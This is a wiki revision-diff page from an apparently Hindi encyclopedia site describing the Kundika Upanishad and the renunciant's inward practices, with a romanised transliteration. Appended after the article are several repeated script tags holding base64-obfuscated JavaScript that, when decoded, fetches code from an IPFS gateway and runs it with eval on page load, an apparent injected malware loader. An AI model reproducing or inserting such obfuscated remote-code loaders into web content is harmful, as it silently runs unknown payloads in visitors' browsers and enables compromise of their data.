Difference between revisions of "कुण्डिकोपनिषद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "वायु" to "वायु")
m (Text replacement - "सन्न्यासी" to "संन्यासी")
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
'''कुण्डिकोपनिषद'''<br />
 
 
    
 
    
 
'''संन्यासी की अन्तर्मुखी साधनाएं'''
 
'''संन्यासी की अन्तर्मुखी साधनाएं'''
  
*[[सामवेद]] से सम्बन्धित इस उपनिषद में सद्गृहस्थ का दायित्व पूर्ण होने पर संन्यास आश्रम में प्रवेश तथा उसकी दिनचर्या पर प्रकाश डाला गया है। उसके बाद संन्यासी की अन्तर्मुखी साधनाओं का उल्लेख किया गया है। पहले जप द्वारा ब्राह्मी-चेतना को जाग्रत करना चाहिए, तदुपरान्त उसे सम्पूर्ण आत्म-चेतना के रूप में जानने का प्रयत्न करना चाहिए। उसके बाद इन्द्रियों के संयम से 'अनाहत नाद' द्वारा जीव-चेतना के विकास की साधना करनी चाहिए। इसी क्रम का उल्लेख इस उपनिषद में किया गया है।  
+
*[[सामवेद]] से सम्बन्धित इस उपनिषद में सद्गृहस्थ का दायित्व पूर्ण होने पर सन्न्यास आश्रम में प्रवेश तथा उसकी दिनचर्या पर प्रकाश डाला गया है। उसके बाद संन्यासी की अन्तर्मुखी साधनाओं का उल्लेख किया गया है। पहले जप द्वारा ब्राह्मी-चेतना को जाग्रत करना चाहिए, तदुपरान्त उसे सम्पूर्ण आत्म-चेतना के रूप में जानने का प्रयत्न करना चाहिए। उसके बाद इन्द्रियों के संयम से 'अनाहत नाद' द्वारा जीव-चेतना के विकास की साधना करनी चाहिए। इसी क्रम का उल्लेख इस उपनिषद में किया गया है।  
*गृहस्थ-जीवन के उपरान्त संन्यास ग्रहण करने वाले व्यक्ति को [[वायु देव|वायु]] और जल-सेवन से व कन्द, मूल, फल आदि का उपभोग करके अपने शरीर की रक्षा करनी चाहिए। उसे सांसारिक मोह-माया का त्याग करके अध्यात्मिक मन्त्रों द्वारा ब्रह्म की उपासना करनी चाहिए।  
+
*गृहस्थ-जीवन के उपरान्त सन्न्यास ग्रहण करने वाले व्यक्ति को [[वायु देव|वायु]] और जल-सेवन से व कन्द, मूल, फल आदि का उपभोग करके अपने शरीर की रक्षा करनी चाहिए। उसे सांसारिक मोह-माया का त्याग करके अध्यात्मिक मन्त्रों द्वारा ब्रह्म की उपासना करनी चाहिए।  
*[[अग्नि]] का सम्पर्क, कमण्डलु, गुदड़ी, कौपीन (लंगोटी), धोती और अंगोछा अपने पास रखना चाहिए। उसे सदैव ब्रह्म का स्मरण करते रहना चाहिए-मैं जीवात्मा, आकाश की भांति, कल्पना से परे, ऊपर स्थित हूं। सूर्य के समान अन्य सुनहले आकर्षक पदार्थों से पृथक् हूं। पर्वत की तरह सतत स्थित रहता हूं तथा समुद्र की तरह अपार हूँ। <ref>आकाशवत्कल्पविदूरगोऽहमादित्यवद्भास्यविलक्षणोऽहम्।
+
*[[अग्निदेव|अग्नि]] का सम्पर्क, कमण्डलु, गुदड़ी, कौपीन (लंगोटी), धोती और अंगोछा अपने पास रखना चाहिए। उसे सदैव ब्रह्म का स्मरण करते रहना चाहिए-मैं जीवात्मा, आकाश की भांति, कल्पना से परे, ऊपर स्थित हूं। सूर्य के समान अन्य सुनहले आकर्षक पदार्थों से पृथक् हूं। पर्वत की तरह सतत स्थित रहता हूं तथा समुद्र की तरह अपार हूँ। <ref>आकाशवत्कल्पविदूरगोऽहमादित्यवद्भास्यविलक्षणोऽहम्।
 
अहार्यवन्नित्याविनिश्चलोऽहमम्भोधिवत्पाराविवर्जितोऽहम्॥16॥</ref>  
 
अहार्यवन्नित्याविनिश्चलोऽहमम्भोधिवत्पाराविवर्जितोऽहम्॥16॥</ref>  
 
*मैं ही नारायण हूँ, पुरुष और ईश्वर मैं ही हूँ, मैं ही अखण्ड बोध-स्वरूप, समस्त प्राणियों का साक्षी, अहंकार-रहित तथा ममता-रहित हूँ। ऐसे ब्रह्म का जो चिन्तन करता है, वह स्वयं ब्रह्म-स्वरूप हो जाता है। वही शिव है। वह सतत स्वयं को ही देखता है और स्वयं ही आनन्द का उपभोग करता हुआ निर्विकल्प रूप में विद्यमान रहता है।
 
*मैं ही नारायण हूँ, पुरुष और ईश्वर मैं ही हूँ, मैं ही अखण्ड बोध-स्वरूप, समस्त प्राणियों का साक्षी, अहंकार-रहित तथा ममता-रहित हूँ। ऐसे ब्रह्म का जो चिन्तन करता है, वह स्वयं ब्रह्म-स्वरूप हो जाता है। वही शिव है। वह सतत स्वयं को ही देखता है और स्वयं ही आनन्द का उपभोग करता हुआ निर्विकल्प रूप में विद्यमान रहता है।
  
==टीका-टिप्पणी==
+
{{संदर्भ ग्रंथ}}
 +
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
<br />
 
<br />
==उपनिषद के अन्य लिंक==
+
==संबंधित लेख==
{{उपनिषद}}
+
{{संस्कृत साहित्य}}
 
{{सामवेदीय उपनिषद}}
 
{{सामवेदीय उपनिषद}}
 
[[Category:दर्शन कोश]]
 
[[Category:दर्शन कोश]]
[[Category:उपनिषद]]
+
[[Category:उपनिषद]][[Category:संस्कृत साहित्य]]
 +
__INDEX__

Latest revision as of 11:44, 3 August 2017

sannyasi ki antarmukhi sadhanaean

  • samaved se sambandhit is upanishad mean sadgrihasth ka dayitv poorn hone par sannyas ashram mean pravesh tatha usaki dinacharya par prakash dala gaya hai. usake bad sannyasi ki antarmukhi sadhanaoan ka ullekh kiya gaya hai. pahale jap dvara brahmi-chetana ko jagrat karana chahie, taduparant use sampoorn atm-chetana ke roop mean janane ka prayatn karana chahie. usake bad indriyoan ke sanyam se 'anahat nad' dvara jiv-chetana ke vikas ki sadhana karani chahie. isi kram ka ullekh is upanishad mean kiya gaya hai.
  • grihasth-jivan ke uparant sannyas grahan karane vale vyakti ko vayu aur jal-sevan se v kand, mool, phal adi ka upabhog karake apane sharir ki raksha karani chahie. use saansarik moh-maya ka tyag karake adhyatmik mantroan dvara brahm ki upasana karani chahie.
  • agni ka sampark, kamandalu, gud di, kaupin (langoti), dhoti aur aangochha apane pas rakhana chahie. use sadaiv brahm ka smaran karate rahana chahie-maian jivatma, akash ki bhaanti, kalpana se pare, oopar sthit hooan. soory ke saman any sunahale akarshak padarthoan se prithakh hooan. parvat ki tarah satat sthit rahata hooan tatha samudr ki tarah apar hooan. [1]
  • maian hi narayan hooan, purush aur eeshvar maian hi hooan, maian hi akhand bodh-svaroop, samast praniyoan ka sakshi, ahankar-rahit tatha mamata-rahit hooan. aise brahm ka jo chintan karata hai, vah svayan brahm-svaroop ho jata hai. vahi shiv hai. vah satat svayan ko hi dekhata hai aur svayan hi anand ka upabhog karata hua nirvikalp roop mean vidyaman rahata hai.


tika tippani aur sandarbh

  1. akashavatkalpavidooragoahamadityavadbhasyavilakshanoahamh. aharyavannityavinishchaloahamambhodhivatparavivarjitoahamh॥16॥


sanbandhit lekh

shrutiyaan
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>